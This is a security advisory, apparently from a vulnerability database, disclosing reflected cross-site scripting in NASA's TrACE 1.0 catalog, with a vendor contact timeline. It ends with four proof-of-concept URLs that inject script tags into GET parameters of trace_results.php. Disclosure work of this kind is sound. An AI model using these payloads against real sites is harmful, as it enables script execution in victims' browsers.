NASA Tri-Agency Climate Education (TrACE) 1.0 XSS

2012.10.27

Credit: Gjoko 'LiquidWorm' Krstic

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

?
NASA Tri-Agency Climate Education (TrACE) v1.0 Multiple XSS Vulnerabilities


Vendor: NASA
Product web page: http://www.nasa.gov
Affected version: 1.0

Summary: The Tri-Agency Climate Education (TrACE) Catalog provides search and
browse access to a catalog of educational products and resources. TrACE focuses
on climate education resources that have been developed by initiatives funded
through NASA, NOAA, and NSF, comprising a tri-agency collaboration around
climate education.

Desc: The application suffers from a reflected cross-site scripting vulnerability
when input is passed to the 'product_id', 'pi', 'project_id' and 'funder' GET parameters
in 'trace_results.php' script which is not properly sanitised before being returned
to the user. This can be exploited to execute arbitrary HTML and script code in a
user's browser session in context of an affected site.

Tested on: Apache/2.2.21
           PHP 5.2.17


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience
                              Zero Science Lab - http://www.zeroscience.mk


Vendor status:

[03.10.2012] Vulnerabilities discovered.
[03.10.2012] Initial contact with the vendor.
[04.10.2012] No reply from vendor.
[05.10.2012] Tried contacting the vendor again.
[12.10.2012] No reply from vendor.
[13.10.2012] Last try contacting the vendor.
[15.10.2012] Vendor replies stating that the problem is solved?!
[16.10.2012] Replied to vendor that no problems are solved because no details were sent nor problems explained.
[17.10.2012] Vendor decides to talk serious and asks for details, cynically.
[18.10.2012] Sent detailed information and PoC files to the vendor.
[22.10.2012] Asked vendor for status report.
[22.10.2012] No reply from vendor.
[23.10.2012] Vendor silently patches the application (v2.0).
[23.10.2012] Asked vendor to have proper communication.
[25.10.2012] No reply from vendor.
[25.10.2012] Pointed out to the vendor about disclosure policy and ethical communication.
[26.10.2012] Public security advisory released.


Advisory ID: ZSL-2012-5111
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5111.php



03.10.2012



PoC:
----


- https://www.example.com/trace/trace_results.php?product_id=117"><script>alert(1);</script>&project_id=40&funder=31&pi=43
- https://www.example.com/trace/trace_results.php?product_id=117&project_id=40"><script>alert(2);</script>&funder=31&pi=43
- https://www.example.com/trace/trace_results.php?product_id=117&project_id=40&funder=31"><script>alert(3);</script>&pi=43
- https://www.example.com/trace/trace_results.php?product_id=117&project_id=40&funder=31&pi=43"><script>alert(4);</script>

References:

http://www.nasa.gov

http://www.zeroscience.mk

http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5111.php

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

NASA Tri-Agency Climate Education (TrACE) 1.0 XSS

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.